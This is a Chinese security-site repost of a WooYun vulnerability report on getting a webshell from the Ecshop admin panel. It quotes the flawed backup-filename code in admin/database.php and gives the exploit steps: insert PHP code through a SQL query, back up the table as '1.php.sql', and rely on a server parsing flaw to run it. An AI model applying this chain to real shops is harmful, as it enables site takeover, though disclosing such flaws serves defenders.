热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Ecshop后台getshell-2 (解析漏洞拿shell)

发布时间:2014-02-26 09:32文章来源:wooyun文章作者:Matt 点击次数:
摘要:详细说明: admin/database.php if($_REQUEST['act']=='dumpsql') {省略若干 if(empty($_REQUEST['sql_file_name'])) { $ sql_file_name =$dump- get_random_name(); } else {省略若干 $ sql_file_name = str_replace (0xa,'',trim($_REQUEST['sql_file_name...

详细说明:

 

  1. admin/database.php 
  2.  
  3. if ($_REQUEST['act'] == 'dumpsql') 
  4.  
  5. {省略若干 
  6.  
  7. if (empty($_REQUEST['sql_file_name'])) 
  8.  
  9.  
  10. $sql_file_name = $dump->get_random_name(); 
  11.  
  12.  
  13. else 
  14.  
  15. {省略若干 
  16.  
  17. $sql_file_name = str_replace("0xa", '', trim($_REQUEST['sql_file_name'])); // 过滤 0xa 非法字符 
  18.  
  19. $pos = strpos($sql_file_name, '.sql'); 
  20.  
  21. if ($pos !== false) 
  22.  
  23.  
  24. $sql_file_name = substr($sql_file_name, 0, $pos); 
  25.  
  26.  
  27. }省略若干 
  28.  
  29. if (!@file_put_contents(ROOT_PATH . DATA_DIR . '/sqldata/' . $sql_file_name . '.sql', $dump->dump_sql)) 
  30.  
  31.  
  32. sys_msg(sprintf($_LANG['fail_write_file'], $sql_file_name . '_' . $vol . '.sql'), 1, array(array('text'=>$_LANG['02_db_manage'], 'href'=>'database.php?act=backup')), false); 
  33.  
  34. }; 

漏洞证明:

备份数据库可以直接写出shell

我们可以insert一个shell

然后备份制定的表

 

利用数据查询

执行

insert into ecs_wholesale values(2,1,'<?php phpinfo();?>',1,1,1)

 

Ecshop后台getshell-2 (解析漏洞拿shell)

 

然后在进行备份ecs_wholesale 这个表

然后我们备份文件名设置成1.php.sql

 

Ecshop后台getshell-2 (解析漏洞拿shell)

利用解析漏洞

就可以获得一个shell了

 

Ecshop后台getshell-2 (解析漏洞拿shell)

 

标签分类:

上一篇:ECSHOP 后台getshell 方法又一则
下一篇:Discuz附件下载权限绕过方法